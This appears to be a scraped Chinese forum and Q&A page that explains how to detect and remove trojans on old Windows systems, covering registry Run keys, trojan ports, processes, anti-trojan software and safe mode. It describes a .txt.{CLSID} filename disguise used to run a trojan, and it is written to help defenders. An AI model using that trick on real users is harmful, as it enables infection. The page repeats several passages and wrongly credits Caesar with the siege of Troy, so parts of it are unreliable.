1、从菜单中加载。如果自动加载的文件是直接通过在Windows菜单上自定义添加的,一般都会放在主菜单的“开始->程序->启动”处,在Win98资源管理器里的位置是“C:windowsstartmenuprograms启动”处。通过这种方式使文件自动加载时,一般都会将其存放在注册表中下述4个位置上:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserS!hellFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\UserShellFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellFolders
2、在注册表中的情况最复杂,在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE,这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“AcidBatteryv1.0木马”,它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer键值改为Explorer=“C:\WINDOWS\expiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名,再在整个注册表中搜索即可。
3、此外在注册表中的HKEY_CLASSES_ROOT\exefile\shell\open\command=
“1”“*”处,如果其中的“1”被修改为木马,那么每次启动一个该可执行文件时木马就会启动一次,例如著名的冰河木马就是将TXT文件的Notepad.exe改成!了它自己的启动文件,每次打开记事本时就会自动启动冰河木马,做得非常隐蔽。
注册表可以通过在“运行”对话框中输入“regedit”来查看。需要说明的是,对系统注册表进行删除修改操作前一定要将注册表备份,因为对注册表操作有一定的危险性,加上木马的隐藏较隐蔽,可能会有一些误操作,如果发现错误,可以将备份的注册表文件导入到系统中进行恢复。(次命令同样很危险,如不懂计算机请不要尝试。切记)
C、端口(端口,其实就是网络数据通过操作系统进入计算机的入口)
1、万变不离其宗,木马启动都有一个方式,它只是在一个特定的情况下启动。所以平常多注意你的端口。一般的木马默认端口有
BO31337,YAL1999,Deep2140,Throat3150,冰河7636,Sub71243
那么如何查看本机开放哪些端口呢?
在dos里输入以下命令:netstat-an,就能看到自己的端口了,一般网络常用端口有:21,23,25,53,80,110,139,如果你的端口还有其他的,你可要注意了,因为现在有许多木马可以自己设定端口。(上面这些木马的端口是以前的,由于时间和安全的关系现在好多新木马的端口我不知道,也不敢去试,因为技术更新的太快了,我跟不上了。55555555555555)
2、由于木马的运行常通过网络的连接来实现的,因此如果发现可疑的网络连接就可以推测木马的存在,最简单的办法是利用Windows自带的Netstat命令来查看。一般情况下,如果没有进行任何上网操作,在MS-DOS窗口中用Netstat命令将看不到什么信息,此时可以使用“netstat-a”,“-a”选项用以显示计算机中目前所有处于监听状态的端口。如果出现不明端口处于监听状态,而目前又没有进行任何网络服务的操作,那么在监听该端口的很可能是木马。
3、系统进程:
在Win2000/XP中按下“CTL+ALT+DEL”,进入任务管理器,就可看到系统正在运行的全部进程,一一清查即可发现木马的活动进程。
在Win98下,查找进程的方法不那么方便,但有一些查找进程的工具可供使用。通过查看系统进程这种方法来检测木马非常简便易行,但是对系统必须熟悉,因为Windows系统在运行时本身就有一些我们不是很熟悉的进程在运行着,因此这个时候一定要小心操作,木马还是可以通过这种方法被检测出来的。
四、软件查杀木马介绍
上面所介绍的都是以手工方式来检测或者清除木马,但一般情况下木马没有那么容易就能发现,木马是很会隐藏的哦。幸好在已经有了不少的反木马软件。下面介绍几款软件,
1、瑞星杀毒软件。
2、个人版天网防火墙。根据反弹式木马的原理,就算你中了别人的木马,但由于防火墙把你的计算机和外界隔开,木马的客户端也连接不上你。防火墙启动之后,一旦有可疑的网络连接或者木马对电脑进行控制,防火墙就会报警,同时显示出对方的IP地址、接入端口等提示信息,通过手工设置之后即可使对方无法进行攻击。不过对于一些个别机器来说,运行天网会影响机器的运行速度。
3、木马克星。目前具我所知,是只查杀木马的软件,也是能查杀木马种类最多的软件。顾名思义,木马克星不克乾坤无敌槌也不克北冥槌法,专克各种木马。但也不是绝对哦,好象“灰鸽子”能屏蔽掉木马克星。(听说而已没试过哦。“灰鸽子”也是一种木马,和冰河差不多。)(现在木马克星大多是没注册的版本。用木马克星查木马时,要是提示你发现木马只有注册用户才能清除,这只是作者的一个小手段,其实他的意思是如果发现木马,那么只有注册用户才能清楚,要是真的发现了木马,软件会告诉你木马的具体位置和名字是什么。我们用其他的软件和手段清除不就行了)
4。绿鹰PC万能精灵。他会实时监控你的计算机,看着“系统安全”心理舒服多了。
有了类似的这些防护软件,你的计算机基本上是安全了。但道高一尺,魔高一丈。最近又出现了一种可以把木马伪装易容的程序(不知道是哪个高手搞的,很是厉害),就是把木马本体根据排列组合生成多个木马,而杀毒软件只能查杀他们的母体。而后生成的木马就不能查到了,所以手动人工的清除木马我们还是要掌握一些地。
软件查杀其他病毒很有效,对木马的检查也是蛮成功地,但彻底地清除不很理想,因为一般情况下木马在电脑每次启动时都会自动加载,而杀病毒软件却不能完全清除木马文件,总的说来,杀病毒软件作为防止木马的入侵来说更有效。
五、木马的防御
随着网络的普及和网络游戏装备可以换人民币的浪潮,木马的传播越来越快,而且新的变种层出不穷,我们在检测清除它的同时,更要注意采取措施来预防它,下面列举几种预防木马的方法。(大家的意见,我借用而已)
1、不要下载、接收、执行任何来历不明的软件或文件
很多木马病毒都是通过绑定在其他的软件或文件中来实现传播的,一旦运行了这个被绑定的软件或文件就会被感染,因此在下载的时候需要特别注意,一般推荐去一些信誉比较高的站点。在软件安装之前一定要用反病毒软件检查一下,建议用专门查杀木马的软件来进行检查,确定无毒和无马后再使用。
2、不要随意打开邮件的附件,也不要点击邮件中的可疑图片。(后边另外介绍一个关于邮件的例子,大家注意收看。)
3、将资源管理器配置成始终显示扩展名。将Windows资源管理器配置成始终显示扩展名,一些文件扩展名为vbs、shs、pif的文件多为木马病毒的特征文件,如果碰到这些可疑的文件扩展名时就应该引起注意。
4、尽量少用共享文件夹。如果因工作等原因必须将电脑设置成共享,则最好单独开一个共享文!件夹,把所有需共享的文件都放在这个共享文件夹中,注意千万不要将系统目录设置成共享。
5、运行反木马实时监控程序。木马防范重要的一点就是在上网时最好运行反木马实时监控程序,PC万用精灵等软件一般都能实时显示当前所有运行程序并有详细的描述信息。此外如加上一些专业的最新杀毒软件、个人防火墙等进行监控基本就可以放心了。
6、经常升级系统。很多木马都是通过系统漏洞来进行攻击的,微软公司发现这些漏洞之后都会在第一时间内发布补丁,很多时候打过补丁之后的系统本身就是一种最好的木马防范办法。
六、木马传播的个别范例(给大家介绍一个邮件类的)
1、来自网络的攻击手段越来越多了,一些带木马的恶意网页会利用软件或系统操作平台等的安全漏洞,通过执行嵌入在网页HTML超文本标记语言内的JavaApplet小应用程序、javascript脚本语言程序、ActiveX软件部件交互技术支持可自动执行的代码程序,强行修改用户操作系统的注册表及系统实用配置程序,从而达到非法控制系统资源、破坏数据、格式化硬盘、感染木马程序、盗取用户数据资料等目的。
目前来自网页的攻击分为两种:一种是通过编辑的脚本程序修改IE浏览器;另外一种是直接破坏Windows系统。前者一般会修改IE浏览器的标题栏、默认主页或直接将木马“种”在你的机器里等等;后者是直接锁定你的键盘、鼠标等输入设备然后对系统进行破坏。
(作者插言):还好目前盗取千年用户名和密码的“木马”功能还仅仅是偷盗行为,没有发展成破坏行为。要不然号被盗了,在顺便把硬盘被格式化了。那样想第一时间找回密码就都没可能。希望这种情况不要发生。(啊门我弥佗佛)
下边是正题了,大家看仔细了!
假如您收到的邮件附件中有一个看起来是这样的文件(或者貌似这类文件,总之是特别诱人的文件,而且格式还很安全。):QQ靓号放送.txt,您是不是认为它肯定是纯文本文件?我要告诉您,不一定!它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来,您看到的就是个.txt文件,这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢?请看如果这个文件的内容如下:
您可能以为它会调用记事本来运行,可是如果您双击它,结果它却调用了HTML来运行,并且自动在后台开始通过网页加载木马文件。同时显示“正在打开文件”之类的这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧?
欺骗实现原理:当您双击这个伪装起来的.txt时候,由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B},也就是.html文件,于是就会以html文件的形式运行,这是它能运行起来的先决条件。
在某些恶意网页木马中还会调用“WScript”。
WScript全称WindowsScriptingHost,它是Win98新加进的功能,是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器,位于c:\WINDOWS下,正是它使得脚本可以被执行,就象执行批处理一样。在WindowsScriptingHost脚本环境里,预定义了一些对象,通过它自带的几个内置对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
最近听不少玩家反映,许多马夫通过冒充千年官方网站的办法给玩家发名字类似“您的千年密码确认函”、“您的千年资料保护建议”等的邮件,来骗取玩家的信任,来点击运行该木马邮件。希望广大玩家在点击这类邮件时一定要看清邮件是否来自于千年官方网站。如是来自其他什么网站或个人邮箱的,马上删除,记得一定要马上删除,别抱任何侥幸心理。
七、关于“木马”的防御(纯属个人意见,不付法律责任)
防止木马对在家上网来说是很简单的事,无非就是装一大堆杀毒软件,并及时升级。(再新的木马只要传播速度快的话很快就会成为各种杀毒软件的战利品,除非此人专门定做个人木马)在加上天网防火墙(很多黑客就是利用口令和漏洞进行远程控制,该防火墙可以防止口令和漏洞入侵)基本上就可以解决问题啦,除非是自己好奇或是不小心打开了木马服务端,我想这种情况还是占一定的比例!
但是对网吧上网的来说,再好的防御也是白撤。
据我所知,现在的网吧安全系数几乎等于00000000,现在最厉害的应该就是装个还“原精灵吧”,但是......我个人认为那东西用处不是很大,说是保护用户密码还不如说它是网吧保护系统的一种软件。现在的木马一般都是通过邮件方式传送密码的,也就是说,你只要在输入框内输入你的密码之后,木马控制方就已经得到你的ID和密码了(一般不会超过三分钟)!对网吧上网的朋友来说,靠复制方法输入ID和密码算最安全的了,很多木马程序实际上就是一个键盘记录工具,在你不知情的情况下把你的键盘输入情况全部记录了下来,然后通过网络发送出去!(好可怕哦,不过具我所知现在公安部和文化部已经明令禁止网吧安装还原精灵了,说是为了保留历史记录云云。唉~~就这么点防御手段也给封杀了,哭哦)
总之,家庭上网用户记得随时更新自己的病毒库,随时检查计算机进程,发现不明进程马上格杀,不浏览一些不明站点(我通常是靠域名来分析站点的可靠程度,一般一级域名都不会出现恶意代码和网页木马),更别随意接收别人给你发送的文件和邮件!
网吧防盗真的很困难了,什么人都有,复杂了,就算老板花钱去注册一个木马克星,呵呵。。。都没用,想做坏事的人同样能把他干掉~~~~我个人认为,网吧上网除了复制ID密码粘贴到输入框,其他的就得听天由命了~~~~~
八、关于大家都用的醉翁巷1.1G的说明
用了人家的软件,就总要替人家说句公道话。前些时候,有人说醉翁1.1G软件运行后,没什么反映。当关闭软件的一刹那,一些防护类软件提示:此软件正在监视本机键盘!!
其实就是醉翁巷中的hook.dll文件在作怪。下面给大家说说“勾子”的我问题。
什么是勾子
在Windows系统中,勾子(hook)是一种特殊的消息处理机制。勾子可以监视系统或进程中的各种事件消息,截获发往目标窗口的消息并进行处理。这样,我们就可以在系统中安装自定义的勾子,监视系统中特定事件的发生,完成特定的功能,比如截获键盘、鼠标的输入,屏幕取词,日志监视等等。可见,利用勾子可以实现许多特殊而有用的功能。因此,对于高级编程人员来说,掌握勾子的编程方法是很有必要的。
勾子的类型
按使用范围分类,主要有线程勾子和系统勾子
(1)线程勾子监视指定线程的事件消息。
(2)系统勾子监视系统中的所有线程的事件消息。因为系统勾子会影响系统中所有的应用程序,所以勾子函数必须放在独立的动态链接库(DLL)中。这是系统勾子和线程勾子很大的不同之处。
醉翁巷中的hook.dll就是完成以上功能的程序,由于勾子对程序的特殊性,所以会有部分软件报告发现他在记录键盘动作,不过不会报告说他是木马。(呵呵搞的确实挺吓人的。不过就算它记录键盘动作,只要不发送就没太大危险了)
九、大总结(就是对上边的大总结啦)
大家知道了“木马”的工作原理,查杀“木马”就变得很容易,如果发现有“木马”存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。然后在根据实际情况进行处理。
下面给大家说一下我机器的防护装备:(一共就5样)
XFILTER日夏养花网个人防火墙:这个防火墙没什么防病毒的功能,它只监视所有未经过我个人许可的程序连接网络。任何程序连接网络它都会通告并询问。比如安装完该软件“第一次”运行千年,它会提示你C:\ProgramFiles\1000y\Client.exe要连接网络,是否放行。它就是这样来防范的。
瑞星杀毒软件:以杀各种恶意病毒和木马为主,2004版专门提供游戏保护。
还原精灵:记录当前硬盘和系统信息。不管以后对硬盘和系统进行什么操作都能还原成初始模样。比如我们2003年11月1日对当前C硬盘和系统进行备份保存,2003年12月1日由于感染木马,对系统进行还原,还原后所有东西都会回到2003年11月1日备份是的样子。不论你在C盘上进行了什么操作,都会变回备份时的样子。这个软件就有一个缺点,会影响机器的启动速度。但不影响机器的运行。最近还有朋友反映新版本和某些游戏有冲突。
木马克星:这个我就不多说了,网络游戏玩家必备的东东。
十六进制编译器:具体名字我就不说了,有兴趣的朋友随便找一个用就行了。主要是对一些可疑程序进行扫描和检测。
以上各个软件在各大门户网站和各大下载专业网站都可以找到,在这里小女子就不提供网址了,避免不必要的麻烦。
一个完整的特洛伊木马套装程序含了两部分:服务端(服务器部分)和客户端(控制器部分)。
植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服务端的电脑。
运行了木马程序的服务端以后,会产生一个有着容易迷惑用户的名称的进程,暗中打开端口,向指定地点发送数据(如网络游戏的密码,即时通信软件密码和用户上网密码等),黑客甚至可以利用这些打开的端口进入电脑系统。
特洛伊木马程序不能自动操作, 一个特洛伊木马程序是包含或者安装一个存心不良的程序的, 它可能看起来是有用或者有趣的计划。
特洛伊木马不会自动运行,它是暗含在某些用户感兴趣的文档中,用户下载时附带的。当用户运行文www.rixia.cc档程序时,特洛伊木马才会运行,信息或文档才会被破坏和遗失。
特洛伊木马和后门不一样,后门指隐藏在程序中的秘密功能,通常是程序设计者为了能在日后随意进入系统而设置的。
植入对方电脑的是服务端,而黑客正是利用客户端进入运行了服务端的电脑。
运行了木马程序的服务端以后,会产生一个有着容易迷惑用户的名称的进程,暗中打开端口,向指定地点发送数据(如网络游戏的密码,即时通信软件密码和用户上网密码等),黑客甚至可以利用这些打开的端口进入电脑系统。
特洛伊木马程序不能自动操作, 一个特洛伊木马程序是包含或者安装一个存心不良的程序的, 它可能看起来是有用或者有趣的计划。
特洛伊木马不会自动运行,它是暗含在某些用户感兴趣的文档中,用户下载时附带的。当用户运行文www.rixia.cc档程序时,特洛伊木马才会运行,信息或文档才会被破坏和遗失。
特洛伊木马和后门不一样,后门指隐藏在程序中的秘密功能,通常是程序设计者为了能在日后随意进入系统而设置的。
木马是一种恶意代码,大部分利用软件本身的功能和漏洞实现远程攻击管理等目的。为什么叫木马呢,恺撒大帝知道吧,恺撒大帝攻打了叫特洛依的城镇,此镇靠地型易守
难攻,恺撒久攻不下,最后诈败,留了一批木马,木马里放了个人进去,晚上这个人跑出来把城的后门打开了,恺撒的军队长驱直入,搞定了特络绎。
所以这种以打开端口(后门)而取得控制权的恶意代码被形象的称为木马。
补充下 win的 系统本身支持远程调控,所以不要以为远程控制是什么很神秘的事情
难攻,恺撒久攻不下,最后诈败,留了一批木马,木马里放了个人进去,晚上这个人跑出来把城的后门打开了,恺撒的军队长驱直入,搞定了特络绎。
所以这种以打开端口(后门)而取得控制权的恶意代码被形象的称为木马。
补充下 win的 系统本身支持远程调控,所以不要以为远程控制是什么很神秘的事情
木马简单用中文说就是“披着羊皮的狼”
复制粘贴只对少数木马有作用,因为监控本机的剪切缓存是一件非常简单的事情。
复制粘贴只对少数木马有作用,因为监控本机的剪切缓存是一件非常简单的事情。
特洛依木马,听说过吗?
里应外合,你该懂吧.
很简单.
用复制粘贴要安全得多.
里应外合,你该懂吧.
很简单.
用复制粘贴要安全得多.
如何准确判断自己的电脑是否存在木马
杀毒软件查杀一下吧,木马和病毒不同,不会占用大量资源,不容易判断。
1 怎样判断你的电脑存在含病毒 电脑出故障不只是因为感染病毒才会有的,个人电脑使用过程中出现各种故障现象多是因为电脑本身的软、硬件故障引起的,网络上的多是由于权限设置所致。我们只有充分地了解两者的区别与联系,才能作出正确的判断,在真正病毒来了之时才会及时发现。下面我就简要列出了分别因病毒和软、硬件故障引起的一些常见电脑故障症状分析。 症状 病毒的入侵的可能性 软、硬件故障的可能性 经常死机:病毒打开了许多文件或占用了大量内存;不稳定(如内存质量差,硬件超频性能差等);运行了大容量的软件占用了大量的内存和磁盘空间;使用了一些测试软件(有许多BUG);硬盘空间不够等等;运行网络上的软件时经常死机也许是由于网络速度太慢,所运行的程序太大,或者自己的工作站硬件配置太低。 系统无法启动:病毒修改了硬盘的引导信息,或删除了某些启动文件。如引导型病毒引导文件损坏;硬盘损坏或参数设置不正确;系统文件人为地误删除等。 文件打不开:病毒修改了文件格式;病毒修改了文件链接位置。文件损坏;硬盘损坏;文件快捷方式对应的链接位置发生了变化;原来编辑文件的软件删除了;如果是在局域网中多表现为服务器中文件存放位置发生了变化,而工作站没有及时涮新服器的内容(长时间打开了资源管理器)。 经常报告内存不够:病毒非法占用了大量内存;打开了大量的软件;运行了需内存资源的软件;系统配置不正确;内存本就不够(目前基本内存要求为128M)等。 提示硬盘空间不够:病毒复制了大量的病毒文件(这个遇到过好几例,有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了,一安装软件就提示硬盘空间不够。硬盘每个分区容量太小;安装了大量的大容量软件;所有软件都集中安装在一个分区之中;硬盘本身就小;如果是在局域网中系统管理员为每个用户设置了工作站用户的"私人盘"使用空间限制,因查看的是整个网络盘的大小,其实"私人盘"上容量已用完了。 软盘等设备未访问时出读写信号:病毒感染;软盘取走了还在打开曾经在软盘中打开过的文件。 出现大量来历不明的文件:病毒复制文件;可能是一些软件安装中产生的临时文件;也或许是一些软件的配置信息及运行记录。 启动黑屏:病毒感染(记得最深的是98年的4.26,我为CIH付出了好几千元的代价,那天我第一次开机到了Windows画面就死机了,第二次再开机就什么也没有了);显示器故障;显示卡故障;主板故障;超频过度;CPU损坏等等 数据丢失:病毒删除了文件;硬盘扇区损坏;因恢复文件而覆盖原文件;如果是在网络上的文件,也可能是由于其它用户误删除了。 键盘或鼠标无端地锁死:病毒作怪,特别要留意"木马";键盘或鼠标损坏;主板上键盘或鼠标接口损坏;运行了某个键盘或鼠标锁定程序,所运行的程序太大,长时间系统很忙,表现出按键盘或鼠标不起作用。 系统运行速度慢:病毒占用了内存和CPU资源,在后台运行了大量非法操作;硬件配置低;打开的程序太多或太大;系统配置不正确;如果是运行网络上的程序时多数是由于你的机器配置太低造成,也有可能是此时网路上正忙,有许多用户同时打开一个程序;还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。 系统自动执行操作:病毒在后台执行非法操作;用户在注册表或启动组中设置了有关程序的自动运行;某些软件安装或升级后需自动重启系统。 通过以上的分析对比,我们知道其实大多数故障都可能是由于人为或软、硬件故障造成的,当我们发现异常后不要急于下断言,在杀毒还不能解决的情况下,应仔细分析故障的特征,排除软、硬件及人为的可能性。
由“开始->运行”,输入regedit,确定就可以运行注册表编辑器。再展开至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下,查看键值中有没有自己不熟悉的自动启动文件项目,比如netbus、netspy、netserver等的单词。注意,有的木马程序生成的服务器程序文件很像系统自身的文件,想由此伪装蒙混过关。比如Acid Battery木马,它会在注册表项“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下加入 Explorer=“C:\WINDOWS\expiorer.exe”,木马服务器程序与系统自身的真正的Explorer之间只有一个字母的差别! 就说Run后面有启动文件项目,90%是病毒!
麻烦采纳,谢谢!
麻烦采纳,谢谢!
想知道电脑是否中毒,一般从两个方面入手.第一就是用杀软来帮你检测了.这种很傻瓜型的我就不多介绍了.第二种就需要点技术含量了.第1,你如果是10年左右网龄的用户,应该用肉眼,或者操作方面就能感觉到自己电脑有没有问题了.第2,就是自己对电脑病毒这方面很懂.从哪几个文件夹内去找刻意文件了.
腾讯电脑管家是腾讯公司出品的一款专业的安全软件,它采用4+1引擎,腾讯金山双云端,查杀能力已经达到世界一流水平,而且电脑管家具有电脑管理功能,可以优化系统,修复漏洞,清理垃圾等等,是一款非常优秀的软件。您可以试用一下.
希望能够帮到你.
腾讯电脑管家是腾讯公司出品的一款专业的安全软件,它采用4+1引擎,腾讯金山双云端,查杀能力已经达到世界一流水平,而且电脑管家具有电脑管理功能,可以优化系统,修复漏洞,清理垃圾等等,是一款非常优秀的软件。您可以试用一下.
希望能够帮到你.
电脑自动设置了密码,中木马了么?我要怎么进入系统?
我朋友的电脑。我要帮他重装,可是他的桌面上放着不少重要文档,没备份不行。没有密码,我进不了他的桌面啊。请教。楼上的是个很好的办法,其他说的,基本上在这里不会解决什么问题。实际上解决的最简单办法有两种:
1、最干脆的,拆下硬盘,把他设为从属盘放在你电脑里把C盘的文件考出来。
2、楼上人说的那种方法,但如果你要有PE盘的情况下。
不过我怀疑你朋友的电脑没有设置密码。如果开机以后有登陆框的话,可以试试用户名使用administrator密码为空登陆。如果不行的话用上面的方法。
1、最干脆的,拆下硬盘,把他设为从属盘放在你电脑里把C盘的文件考出来。
2、楼上人说的那种方法,但如果你要有PE盘的情况下。
不过我怀疑你朋友的电脑没有设置密码。如果开机以后有登陆框的话,可以试试用户名使用administrator密码为空登陆。如果不行的话用上面的方法。
进入安全模式啊
一、Windows95环境下进入安全模式:
1、开启计算机,如果正在运行Windows,请重启计算机;
2、在计算机开启时,请留意观察屏幕,当出现"Starting Windows 95"的时候,按住F5键,这样就能进入安全模式;
3、或者,在计算机开启时,当出现"Starting Windows 95"的时候,迅速按住F8键,在出现的启动菜单中选择第三项"Safe Mode"。
二、Windows98/Me环境下进入安全模式:1、在计算机开启时,按住CTRL键直到出现Windows 98启动菜单为止,选择第三项"Safe Mode"。2、或者,在计算机开启时,当出现"Starting Windows 98"的时候,迅速按下F8键,在出现的启动菜单中选择第三项"Safe Mode"。3、如果有多系统引导,在选择Windows98/Me启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的启动菜单中选择第三项"Safe Mode"另外一种方法:1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“高级”按钮,选择“启用“启动”菜单”;
4、然后点击“确定”按钮保存退出,重新启动计算机;
5、重新启动计算机后,就会出现“启动菜单”,选择第三项"Safe Mode";
6、如果要取消“启动菜单”,重复上述1-4步骤,不同的是第3步取消选择“启用“启动”菜单”。如果以上两个方法都失败了,还可以进行以下操作进入安全模式: 1、确认系统启动首先从软驱开始引导启动,插入一张空白软盘或者非引导盘;2、重新启动计算机,当计算机启动的时候,由于所插入的软盘不是引导盘,此时就会看到一条错误信息"Non-System Disk, please replace the disk and press any key.";3、取出软盘,然后按F8键,就会出现启动菜单,选择"Safe Mode";
三、Windows2000环境下进入安全模式:在启动Windows2000时,当看到白色箭头的进度条,按下F8键,出现Windows2000高级选项菜单,有以下一些选项:安全模式 带网络连接的安全模式 带命令提示行的安全模式 启用启动日志模式 启用VGA模式最近一次的正确配置 目录恢复模式 调试模式 正常启动 其中,安全模式:是启动Windows2000的最低配置的设备驱动程序及服务。带网络连接的安全模式:是启动Windows2000的最低配置的设备驱动程序及服务,加上装载网络所需的驱动程序。带命令提示行的安全模式:这与“安全模式”一样,例外的是,www.rixia.cc启动Cmd.exe而不启动Windows资源管理器。一般情况下选择“安全模式”。
四、WindowsXP环境下进入安全模式:1、在计算机开启BIOS加载完之后,迅速按下F8键,在出现的WindowsXP高级选项菜单中选择“安全模式”;2、如果有多系统引导,在选择WindowsXP启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的WindowsXP高级选项菜单中选择“安全模式”。另外一种方式: 1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“Boot.ini”标签;4、选择"/SAFENOOT";5、然后点击“确定”按钮保存退出,重新启动计算机;6、重启之后出现的WindowsXP高级选项菜单和Windows2000的类似,选择“安全模式”即可;7、如果要取消“高级选项菜单”,重复上述1-5步骤,不同的是第4步取消选择"/SAFENOOT"。
在Windows中有一个安全模式,一般情况下我们进入安全模式的时候并不多,如果计算机死机,无法正常的关机和重新启动时,发生这种情况时,可以先进入“安全模式”解决问题后,再进行重新电脑,回到原先使用的操作系统。
下面我们就来了解一下Windows 98、windows 2000和windows XP下安全模式的进入和介绍。
Windows 98下的安全模式
进入windows 98的安全模式很简单,在电脑启动的时候,按住CTRL键直到出现Windows 98启动菜单为止,然后再选择第三项“Safe Mode”,或者电脑启动时,当出现“Starting Windows 98”的时候,迅速按下F8键,也可以在出现的启动菜单中选择第三项“Safe Mode”;如果你的电脑安装了多个操作系统,在选择Windows98启动时,当按下回车键,迅速地按下F8键,这样也会出现启动菜单,选择其中的第三项“Safe Mode”就行了;如果系统在引导过程中检测到某些问题时,系统就会自动引导至“安全模式”状态。
通过“安全模式”来进入windows系统是与正常启动进入windows系统是不一样的,它不会加载其它驱动程序或其它应用程序;因此在“安全模式”中,屏幕显示只有16色,而且无法使用光驱及一些周边设备。所以“安全模式”是最基本而安全的启动模式。
在安全模式一起的还有其他一些启动模式,下面就做一些简单的介绍。
1、 Normal
这是正常启动的模式,就想平时启动电脑一样。
2、 Logged
记录启动模式,它会记录windows驱动程序加载是的详细清单,启动结果将会保存在系统磁盘下的的bootlog.txt中。
3、 Step-By-Step Confirmation
启动时会载入Config.sys和Autoexec.bat文件进行一条一条的执行,你可以根据情况来跳过某条命令。
4、 Command Prompt Only
直接载入Config.sys和Autoexec.bat文件后就跳到DOS下。
5、 Safe Mode Command Prompt Only
通过最少的安全模式启动到DOS下,不载入Config.sys和Autoexec.bat文件。
Windows 2000下的安全模式
进入windows 2000安全模式和win98 的基本差不多,一是自动进入。即当系统在引导过程中检测到某些问题时,系统就会自动引导至“安全模式”状态;二是手工启动。用户可以手工强行使用安全模式,方法是在启动计算机过程中按F8键,之后屏幕上会显示一个菜单,可在菜单中选择“安全模式”。
安全模式启动后,会在桌面的四角显示“安全模式”的字样,提示系统现在正处于“安全模式”状态。如果显示驱动已经损坏或设置错误,那Windows 2000就会自动使用VGA模式显示驱动程序,因为这种通用的VGA显示驱动程序基本可以保证系统正常工作。
在windows2000中的启动菜单中,有多个“安全模式”的启动模式,大家可能会有所疑问:菜单中的这么多选项都代表着什么意思?什么情况下选择什么模式呢?下面就介绍这几类模式各自的用处。
回答者:惟独爱华 - 初学弟子 一级 10-28 10:24
修改答复: 惟独爱华,您要修改的答复如下: 积分规则 关闭
一、Windows95环境下进入安全模式:
1、开启计算机,如果正在运行Windows,请重启计算机;
2、在计算机开启时,请留意观察屏幕,当出现"Starting Windows 95"的时候,按住F5键,这样就能进入安全模式;
3、或者,在计算机开启时,当出现"Starting Windows 95"的时候,迅速按住F8键,在出现的启动菜单中选择第三项"Safe Mode"。
二、Windows98/Me环境下进入安全模式:1、在计算机开启时,按住CTRL键直到出现Windows 98启动菜单为止,选择第三项"Safe Mode"。2、或者,在计算机开启时,当出现"Starting Windows 98"的时候,迅速按下F8键,在出现的启动菜单中选择第三项"Safe Mode"。3、如果有多系统引导,在选择Windows98/Me启动时,当按下回车键,就应该迅速地按下F8键(最好两只手进行操作),在出现的启动菜单中选择第三项"Safe Mode"另外一种方法:1、在Windows环境下,点击“开始”菜单,然后点击“运行”;2、输入msconfig,然后点击“确定”按钮;3、点击“高级”按钮,选择“启用“启动”菜单”;
4、然后点击“确定”按钮保存退出,重新启动计算机;
5、重新启动计算机后,就会出现“启动菜单”,选择第三项"Safe Mode";
6、如果要取消“启动菜单”,重复上述1-4步骤,不同的是第3步取消选择“启用“启动”菜单”。如果以上两个方法都失败了,还可以进行以下操作进入安全模式: 1、确认系统启动首先从软驱开始引导启动,插入一张空白软盘或者非引导盘;2、重新启动计算机,当计算机启动的时候,由于所插入的软盘不是引导盘,此时就会看到一条错误信息"Non-System Disk, please replace the disk and press any key.";3、取出软盘,然后按F8键,就会出现启动菜单,选择"Safe Mode";
三、Windows2000环境下进入安全模式:在启动Windows2000时,当看到白色箭头的进度条,按下F8键,出现Windows2000高级选项菜单,有以下一些选项:安全模式 带网络连接的安全模式 带命令提示行的安全模式 启用启动日志模式 启用VGA模式最近一次的正确配置 目录恢复模式 调试模式 正常启动 其中,安全模式:是启动Windows2000的最低配置的设备驱动程序及服务。带网络连接的安全模式:是启动Windows2000的最低配置的设备驱动程序及服务,加上装载网络所需的驱动程序。带命令提示行的安全模式:这与“安全模式”一样,例外的是,启动Cmd.exe而不启动Windows资源管理器。一般情况下选择“安全模式”。
